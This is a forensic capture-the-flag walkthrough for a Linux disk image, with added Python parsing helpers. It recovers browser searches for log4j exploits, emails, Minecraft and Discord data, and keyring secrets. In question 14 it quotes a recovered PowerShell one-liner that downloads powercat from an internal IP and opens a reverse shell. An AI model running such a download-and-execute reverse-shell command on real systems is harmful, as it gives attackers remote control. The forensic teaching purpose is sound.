
Information
Category Name: Mr.Gamer
Files: c77-linux.zip 14.55 GB
  "2022 CTF – Linux.7z" 14.55 GB
Since the file is large, I recommend either sharing a folder with your VM or using an external drive.
My Recommendations
Download it from CyberDefenders and verify the file with sha1sum:
sha1sum /path/to/c77-linux.zip
SHA1: 62aa7c7d4fcd3f442365b1d7aa6b12a77e244627
This is my personal preference: I like being organized and deleting a folder when I'm done with it.
mkdir Documents/CyberDefenders/Gamer && cd Documents/CyberDefenders/Gamer
sudo ewfmount /path/to/LenovoFinal.E01 /mnt/ewf
sudo mount -o ro,noload,offset=537919488 /mnt/ewf/ewf1 /mnt/Linux
Walkthrough
1: What is the name of the utility/library the user was looking at exploits for?
The question asks what the user is looking for, so we can take a look at Browser History:
sudo find /mnt/Linux -name "places.sqlite" -o -name "History"
Which returns two places.sqlite databases, one for firefox, one for ThunderBird:
We can copy both, although I'm sure the information is in the Firefox history:
cp /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/places.sqlite thunderbird-places.sqlite
cp /mnt/Linux/home/rafael/snap/firefox/common/.mozilla/firefox/mcrcm1xn.default/places.sqlite ff-places.sqlite
sqlitebrowser ff-places.sqlite
In the table moz_places, we can filter the url for google.com/search?. We will see that lots of hacking/exploit stuff was searched, but the user specifically looked for log4j exploits:
Answer: log4j
2: What is the version ID number of the operating system on the machine?
Looking at /etc/issue:
cat /mnt/Linux/etc/issue
Answer: 21.10
3: What is the hostname of the computer?
We can find this information in /etc/hosts:
cat /mnt/Linux/etc/hosts
Answer: rshell-lenovo
4: What is one anime that the user likes?
The question title is "A little blue birdie told me", so it obviously refers to Twitter. We can grep for both strings in Rafael's directory to identify potential files:
grep -r -i 'anime' /mnt/Linux/home/rafael | grep -i twitter
All the links in the Inbox are basically the same, for a status of Anime account. Now, grepping for the exact link:
strings /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com/INBOX | grep -F 'https://twitter.com/AnimeShots___/status/148959235968=' -B 10 -A 10
To validate this, we can grep for "Attack On Titan":
grep -r -s -l -F 'Attack On Titan' /mnt/Linux
Outside the Thunderbird directory, there is a match in "notificationstore.json" in the Firefox profile:
The fact that rafael received a notification for this topic pretty much confirms his luuuv for Attack On Titan.
Answer: Attack on Titan
5: What is the UUID for the attacker's Minecraft account?
There is a .minecraft folder in the user's directory. The player's information can be found in usercache.json:
jq . /mnt/Linux/home/rafael/.minecraft/usercache.json
Answer: 8b0dec19-b463-477e-9548-eef20c861492
6: What VPN client did the user install and use on the machine?
Looking at the dpkg.log, zerotier-one was installed on the machine:
grep -F 'status installed' /mnt/Linux/var/log/dpkg.log | sed 's/^.*status installed //' | sort -u
On top of that, the Firefox history shows that the user searched for ZeroTier, downloaded it and signed in:
Answer: zerotier
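The grep/sed pipeline above lists what dpkg recorded as installed, but it drops the timestamps and it also matches packages that merely passed through the "installed" state again during an upgrade or trigger run. The script below is an added example (not part of the original walkthrough) that parses a constructed set of dpkg.log lines into a timeline, separating fresh installs (the `install ... <none> <version>` lines) from every "status installed" event; the package names and versions in the sample are made up.

```python
# Constructed sample of /var/log/dpkg.log lines (names and versions are invented).
DPKG_LOG = """\
2022-02-08 14:02:58 install zerotier-one:amd64 <none> 1.8.4
2022-02-08 14:02:59 status half-installed zerotier-one:amd64 1.8.4
2022-02-08 14:03:11 status installed zerotier-one:amd64 1.8.4
2022-02-08 14:03:12 trigproc man-db:amd64 2.9.4-2 <none>
2022-02-08 14:03:13 status installed man-db:amd64 2.9.4-2
2022-02-10 09:15:40 upgrade firefox:amd64 1:96.0 1:97.0
2022-02-10 09:15:52 status installed firefox:amd64 1:97.0
"""


def _package_name(field):
    """dpkg writes 'name:arch'; keep only the name."""
    return field.split(":")[0]


def installed_status(log):
    """Every '<date> <time> status installed <pkg:arch> <version>' event, in log order.
    This is what the grep in the walkthrough matches; it includes packages that were
    only reconfigured by a trigger (man-db above) or upgraded (firefox above)."""
    events = []
    for line in log.splitlines():
        p = line.split()
        if len(p) == 6 and p[2] == "status" and p[3] == "installed":
            events.append((f"{p[0]} {p[1]}", _package_name(p[4]), p[5]))
    return events


def new_installs(log):
    """Packages that were new to the system: dpkg logs them as
    '<date> <time> install <pkg:arch> <none> <version>' (old version is '<none>')."""
    events = []
    for line in log.splitlines():
        p = line.split()
        if len(p) == 6 and p[2] == "install" and p[4] == "<none>":
            events.append((f"{p[0]} {p[1]}", _package_name(p[3]), p[5]))
    return events


if __name__ == "__main__":
    for when, pkg, ver in new_installs(DPKG_LOG):
        print(f"{when}  NEW      {pkg} {ver}")
    for when, pkg, ver in installed_status(DPKG_LOG):
        print(f"{when}  installed {pkg} {ver}")
```

On a real image, read `/mnt/Linux/var/log/dpkg.log` (and the rotated `dpkg.log.1`, `dpkg.log.*.gz` files, which the one-liner above does not cover) and feed the text to the two functions.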
7: What was the user's first password for the guest wifi?
Usually, a guest password is sent over email.
strings /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com/INBOX | grep -i guest -B 5 -A 5
The guest wifi is ChamplainGuest, and this is the "template" email they send with the credentials.
To find the first password, we need to find the oldest expiry date:
strings /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com/INBOX | grep -i guest -B 5 -A 5 | grep -F 'Account expires'
The oldest date is Friday, January 28, 2022 17:01, we just need to search for that:
strings /mnt/Linux/home/rafael/.thunderbird/vrvcx2qf.default-release/ImapMail/imap.gmail.com/INBOX | grep -F 'Friday, January 28, 2022 17:01' -B 10
Answer: 093483
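Grep returns the expiry dates in the order they sit in the mailbox file, which is not necessarily chronological, so the "oldest" one has to be picked by parsing the date. The script below is an added example, not part of the original walkthrough: it parses the `Account expires: <weekday>, <month> <day>, <year> <HH:MM>` format seen above and returns the credential from the earliest notice. The mailbox text is constructed; only the network name and the date format come from the walkthrough, and the `Passcode:` field name is an assumption, since the real template is not reproduced here.

```python
import re
from datetime import datetime

# Constructed stand-in for three guest-wifi notices inside an IMAP cache / mbox.
# The 'Passcode:' field name is an assumption; the real template is not shown on the page.
SAMPLE_MAILBOX = """\
From: guest-wifi@example.edu
Subject: Guest wireless access
Network: ChamplainGuest
Account expires: Monday, February 7, 2022 09:00
Passcode: 222222

From: guest-wifi@example.edu
Subject: Guest wireless access
Network: ChamplainGuest
Account expires: Friday, January 28, 2022 17:01
Passcode: 111111

From: guest-wifi@example.edu
Subject: Guest wireless access
Network: ChamplainGuest
Account expires: Wednesday, March 2, 2022 12:30
Passcode: 333333
"""

# Matches e.g. "Friday, January 28, 2022 17:01" (C/English locale month and weekday names).
DATE_FMT = "%A, %B %d, %Y %H:%M"


def parse_guest_notices(text):
    """Return (expiry datetime, passcode) for every notice, sorted oldest first."""
    notices = []
    for block in re.split(r"\n\s*\n", text.strip()):
        expires = re.search(r"^Account expires:\s*(.+)$", block, re.M)
        code = re.search(r"^Passcode:\s*(\S+)$", block, re.M)
        if not (expires and code):
            continue  # not a credential notice
        when = datetime.strptime(expires.group(1).strip(), DATE_FMT)
        notices.append((when, code.group(1)))
    return sorted(notices)


def first_guest_password(text):
    """The passcode attached to the earliest expiry, i.e. the first one issued."""
    notices = parse_guest_notices(text)
    return notices[0][1] if notices else None


if __name__ == "__main__":
    for when, code in parse_guest_notices(SAMPLE_MAILBOX):
        print(when.isoformat(), code)
    print("first:", first_guest_password(SAMPLE_MAILBOX))
```

On the image you would pass the output of `strings` over the INBOX file instead of the constructed text.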
8: The user watched a video that premiered on Dec 11th, 2021. How many views did it have when they watched it on February 9th?
In the Firefox places.sqlite database, I am using this SQL query to find the youtube url watched on February 9th:
SELECT
  moz_places.id AS 'Id',
  moz_places.url,
  moz_places.title,
  moz_places.description,
  datetime(moz_historyvisits.visit_date/1000000, 'unixepoch', 'localtime') AS 'VisitDate'
FROM moz_places
LEFT JOIN moz_historyvisits ON moz_historyvisits.place_id = moz_places.id
ORDER BY VisitDate DESC
Then saving it as a View, and filtering the urls for youtube and the VisitDate for "2022-02-09":
We can copy the links to a browser and see YouTube's information. Id 176 premiered on December 11th 2021. There is nothing in the Wayback Machine, but in Rafael's Pictures directory there are three screenshots dated February 9th.
Looking at the three screenshots shows two different view counts. At 17:42 and 17:31 it had 265,355 views.
At 16:42 it had 265,342 views:
It's unclear which value to submit, but the correct answer is the one from the 16:42 screenshot.
Answer: 265342
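The two places.sqlite steps above (question 1: filter moz_places for Google searches; question 8: join moz_historyvisits to get the visit timestamp) can be scripted instead of clicked through in DB Browser. The script below is an added example, not part of the original walkthrough: it builds a constructed in-memory stand-in for places.sqlite with just the columns the queries need, pulls the search terms out of the `q=` parameter of Google search URLs, and lists visits to a given host on a given day using the same join. Firefox stores visit_date as microseconds since the epoch; the example renders times in UTC rather than `'localtime'` so the result does not depend on the analyst's timezone. All URLs, titles and timestamps in the sample are made up.

```python
import sqlite3
from datetime import datetime, timezone
from urllib.parse import urlparse, parse_qs


def _micros(y, mo, d, h, mi):
    """Firefox visit_date is microseconds since the Unix epoch (PRTime)."""
    return int(datetime(y, mo, d, h, mi, tzinfo=timezone.utc).timestamp() * 1_000_000)


def build_sample_db():
    """Constructed stand-in for places.sqlite (only the columns the queries use)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE moz_places (
            id INTEGER PRIMARY KEY, url TEXT, title TEXT, description TEXT);
        CREATE TABLE moz_historyvisits (
            id INTEGER PRIMARY KEY, place_id INTEGER, visit_date INTEGER);
    """)
    places = [  # constructed rows
        (1, "https://www.google.com/search?q=log4j+exploit&oq=log4j", "log4j exploit - Google Search", None),
        (2, "https://www.google.com/search?q=zerotier+download", "zerotier download - Google Search", None),
        (3, "https://www.youtube.com/watch?v=CONSTRUCTED1", "Sample video one", "constructed"),
        (4, "https://www.youtube.com/watch?v=CONSTRUCTED2", "Sample video two", "constructed"),
        (5, "https://example.org/", "Example Domain", None),
    ]
    visits = [  # (id, place_id, visit_date)
        (1, 1, _micros(2022, 2, 8, 20, 5)),
        (2, 2, _micros(2022, 2, 8, 21, 0)),
        (3, 3, _micros(2022, 2, 9, 16, 40)),
        (4, 4, _micros(2022, 2, 8, 23, 59)),
        (5, 5, _micros(2022, 2, 9, 10, 0)),
        (6, 3, _micros(2022, 2, 9, 17, 30)),  # same video opened again later that day
    ]
    con.executemany("INSERT INTO moz_places VALUES (?,?,?,?)", places)
    con.executemany("INSERT INTO moz_historyvisits VALUES (?,?,?)", visits)
    return con


def google_searches(con):
    """Search terms typed into Google, recovered from the q= parameter of /search? URLs.
    In LIKE patterns only % and _ are wildcards, so the '?' is matched literally."""
    rows = con.execute(
        "SELECT url FROM moz_places WHERE url LIKE '%google.%/search?%' ORDER BY id")
    terms = []
    for (url,) in rows:
        q = parse_qs(urlparse(url).query).get("q")
        if q:
            terms.append(q[0])
    return terms


def visits_on(con, day, host_fragment):
    """(url, visit time in UTC) for each visit on `day` (YYYY-MM-DD) whose URL contains
    host_fragment, newest first. Same join as the walkthrough's query, without 'localtime'."""
    rows = con.execute(
        """SELECT p.url, datetime(v.visit_date / 1000000, 'unixepoch') AS visit_utc
           FROM moz_places p
           JOIN moz_historyvisits v ON v.place_id = p.id
           WHERE p.url LIKE ? AND date(v.visit_date / 1000000, 'unixepoch') = ?
           ORDER BY visit_utc DESC""",
        ("%" + host_fragment + "%", day))
    return rows.fetchall()


if __name__ == "__main__":
    db = build_sample_db()
    print("searches:", google_searches(db))
    for url, when in visits_on(db, "2022-02-09", "youtube.com"):
        print(when, url)
```

To run it against the real profile, replace `build_sample_db()` with `sqlite3.connect("file:ff-places.sqlite?mode=ro", uri=True)` on the copied database; copying it out first, as the walkthrough does, also avoids Firefox's lock on a live profile.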
9: What is the new channel name for the YouTuber whose cookbook is shown on the device?
In rafael's home directory there is a folder named "marshalsec", which contains everything related to the log4j exploit. The poc folder contains screenshots; we can bulk open them with:
find /mnt/Linux/home/rafael -name "*.jpeg" -exec display "{}" \;
The file aaGkBJdu.jpeg contains a screenshot (?) with a cookbook for Binging with Babish:
Searching for it on YouTube shows the channel name is Babish Culinary Universe:
Answer: Babish Culinary Universe
10: What is the module with the highest installed version for the chat application with the mascot Wumpus?
The chat application in question is Discord. We can check its directory to identify potential files:
ls -la /mnt/Linux/home/rafael/.config/discord
The first directory, 0.0.16, is the "version" directory, and it contains a file named "installed.json" which we can check for installation information:
jq . /mnt/Linux/home/rafael/.config/discord/0.0.16/modules/installed.json
The highest installed version is for the discord_voice module:
Answer: discord_voice
11: According to Windows, what was the temperature in Fahrenheit on February 11th, 2022, at 6:30 PM?
This question is related to the screenshots in the marshalsec/poc directory. It's obvious that these screenshots were taken on the victim's machine. Using the same command as before to bulk open the images:
find /mnt/Linux/home/rafael -name "*.jpeg" -exec display "{}" \;
The file marshalsec/poc/YXvySdGd.jpeg matches the timestamp:
The temperature was 45 °F.
Answer: 45F
12: What is the upload date of the second youtube video on the channel from which the user downloaded a youtube video?
Looking at the Downloads directory, there is a .wav file:
ls -la /mnt/Linux/home/rafael/Downloads
We can use exiftool to find out from where it was downloaded:
exiftool /mnt/Linux/home/rafael/Downloads/'Rick Astley - Never Gonna Give You Up (Official Music Video).wav'
Opening the link in a browser and looking at Rick Astley's upload history, the second video was "Whenever You Need Somebody":
Which was uploaded on October 25th, 2009:
Answer: 10/25/2009
13. What is the SHA-1 hash of Minecraft's "latest" release according to the system?
This question literally took me YEARS to solve. In the .minecraft/versions directory there is a file named "version_manifest_v2.json":
jq . /mnt/Linux/home/rafael/.minecraft/versions/version_manifest_v2.json
The first element shows the latest release as "1.18.1" and the snapshot as "22w06a":
For some reason I was convinced that the hashes in the file were irrelevant, as they were hashes of JSON files and not of the actual "executable/release". So I spent lots of time looking up and trying all sorts of hashes related to this specific version. However, the correct answer was right under my eyes.
Answer: 3c6e119c0ff307accf31b596f9cd47ffa2ec6305
14: What were the three flags and their values that were passed to powercat? The answer must be provided in the same format as the entered command. (For example, if the command was "powercat -D Y -l a -n," the answer would be "-D Y -l a -n")
In the marshalsec/poc/ there is a powercat.ps1 file, however no real evidence of execution exists. We can grep the entire partition for the filename:
sudo grep -r -s -l -F 'powercat.ps1' /mnt/Linux
#returns /mnt/Linux/swapfile and /mnt/Linux/home/rafael/.bash_history
strings /mnt/Linux/home/rafael/.bash_history | grep powercat -B 5 -A 5
The bash history shows only evidence of the script being downloaded:
We can check the swapfile:
sudo strings -a -td -el /mnt/Linux/swapfile | grep 'powercat' -B 5 -A 5
and here is the full command:
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.191.253:8000/powercat.ps1');powercat -c 192.168.191.253 -p 4444 -e cmd"
Answer: -c 192.168.191.253 -p 4444 -e cmd
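The reason `strings -el` found the command when the plain ASCII pass did not is that PowerShell/.NET text is typically UTF-16LE, so every character is followed by a null byte and an ASCII-only scan sees no run longer than one character. The script below is an added example, not part of the original walkthrough: it reimplements the two `strings` passes (`-a` over the whole file, ASCII and UTF-16LE) plus the keyword grep over a constructed byte blob that stands in for a slice of the swap file. The IP address in the sample is from the documentation range and the fragments are made up.

```python
import re


def extract_strings(data, min_len=6):
    """Printable runs in a byte blob in both ASCII and UTF-16LE, the two passes that
    `strings -a` (default) and `strings -a -el` perform. Returns sorted
    (offset, encoding, text) tuples so hits can be located with -td-style offsets."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)  # char, NUL, char, NUL, ...
    found = []
    for m in ascii_re.finditer(data):
        found.append((m.start(), "ascii", m.group().decode("ascii")))
    for m in utf16_re.finditer(data):
        found.append((m.start(), "utf-16le", m.group().decode("utf-16-le")))
    return sorted(found)


def find_keyword(data, keyword, min_len=6):
    """Case-insensitive keyword search over both encodings (the grep on the strings output)."""
    needle = keyword.lower()
    return [s for s in extract_strings(data, min_len) if needle in s[2].lower()]


# Constructed stand-in for a slice of /swapfile: an ASCII shell fragment, a UTF-16LE
# PowerShell fragment, binary padding and unrelated text.
SAMPLE_SWAP = (
    b"\x00" * 16
    + b"wget http://203.0.113.5:8000/powercat.ps1\n"
    + b"\x00\xff" * 8
    + 'powershell -c "Import-Module .\\powercat.ps1"'.encode("utf-16-le")
    + b"\x00" * 8
    + b"unrelated ascii filler text"
)


if __name__ == "__main__":
    for offset, encoding, text in find_keyword(SAMPLE_SWAP, "powercat"):
        print(f"{offset:8d} {encoding:9s} {text}")
```

An ASCII-only scan of the sample reports the wget line but not the PowerShell one; the UTF-16LE pass is what recovers it. On a real swap file read it in chunks (with a small overlap so runs spanning a chunk boundary are not cut) rather than loading the whole thing.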
15: How many dimensions (including the overworld) did the player travel to in the "oldest of the worlds"?
Another question I spent hours on since I know nothing about Minecraft.
The three "dimensions" in Minecraft are the Overworld, the Nether, and the End. First, let's identify the "oldest of the worlds". The players' "worlds" are saved under "saves":
ls -la /mnt/Linux/home/rafael/.minecraft/saves
So the "world" is "New World". Then, I did everything possible. I extracted the .mca files, parsed the .dat files but nothing. So I used the hints, which pointed to the "advancements". The directory contains only one file: 8b0dec19-b463-477e-9548-eef20c861492.json. A little googling took me here.
Essentially, if the user traveled to the End or the Nether, the advancement would start with "minecraft:nether" or "minecraft:end". So we can check the JSON file for minecraft and see the list of advancements:
jq . /mnt/Linux/home/rafael/.minecraft/saves/'New World'/advancements/8b0dec19-b463-477e-9548-eef20c861492.json | grep minecraft -B 1
None of these are "end" or "nether", so the user must have stayed in the Overworld.
Answer: one
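The `jq | grep` above works, but eyeballing the list misses two details: the file also carries a top-level integer `DataVersion` entry that is not an advancement, and an advancement entry can exist with `"done": false` when only some of its criteria are met. The script below is an added example, not part of the original walkthrough: it applies the prefix rule from the hint (`minecraft:nether/`, `minecraft:end/`) to constructed stand-ins for the advancements JSON, counting only completed advancements and always including the Overworld. The advancement ids and timestamps in the samples are made up for the example.

```python
import json

# Constructed stand-ins for saves/<world>/advancements/<player uuid>.json.
OVERWORLD_ONLY = json.dumps({
    "minecraft:story/mine_stone": {
        "criteria": {"get_stone": "2022-02-05 18:22:10 -0500"}, "done": True},
    "minecraft:recipes/decorations/crafting_table": {
        "criteria": {"unlock_right_away": "2022-02-05 18:20:01 -0500"}, "done": True},
    "DataVersion": 2865,  # not an advancement; must be skipped
})

WITH_NETHER = json.dumps({
    "minecraft:story/mine_stone": {
        "criteria": {"get_stone": "2022-02-05 18:22:10 -0500"}, "done": True},
    "minecraft:nether/root": {
        "criteria": {"entered_nether": "2022-02-06 11:02:45 -0500"}, "done": True},
    "minecraft:end/root": {"criteria": {}, "done": False},  # never completed
    "DataVersion": 2865,
})

# Advancement-tree prefixes that only exist once the player has entered that dimension.
DIMENSION_PREFIXES = {"minecraft:nether/": "Nether", "minecraft:end/": "End"}


def dimensions_visited(advancements_json):
    """Set of dimensions the player has entered: the Overworld always, plus every
    dimension with at least one completed advancement in its tree."""
    visited = {"Overworld"}
    for adv_id, record in json.loads(advancements_json).items():
        if not isinstance(record, dict) or not record.get("done"):
            continue  # skips DataVersion and partially progressed advancements
        for prefix, dimension in DIMENSION_PREFIXES.items():
            if adv_id.startswith(prefix):
                visited.add(dimension)
    return visited


if __name__ == "__main__":
    for label, blob in ("overworld only", OVERWORLD_ONLY), ("with nether", WITH_NETHER):
        dims = dimensions_visited(blob)
        print(f"{label}: {len(dims)} dimension(s): {sorted(dims)}")
```

For the real file, `json.load(open(path))` on the advancements file under the oldest save gives the same structure.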
16: What is the mojangClientToken stored in the Keystore?
This one took time, but actually, given that the key (Matrix_1999) is provided it was way easier than I thought.
First, let's find the keystore:
sudo find /mnt/Linux -name "*.keystore"
#returns /mnt/Linux/home/rafael/.local/share/keyrings/user.keystore
Then, I copied rafael's keystore to my keyrings directory and changed its name:
cp /mnt/Linux/home/rafael/.local/share/keyrings/user.keystore /home/remnux/.local/share/keyrings/rafael.keystore
I then opened the "Passwords and Keys" app on my machine. A new "Login" tab was there, so I unlocked it with the password Matrix_1999:
Double clicked on the mojangClientToken, and selected copy (the password is hidden) and pasted it in Terminal to get its value, which is 2f76c8b04c004ddd888a05a6cad6be52.
Answer: 2f76c8b04c004ddd888a05a6cad6be52
TLDR
Just a boy playing around with Log4j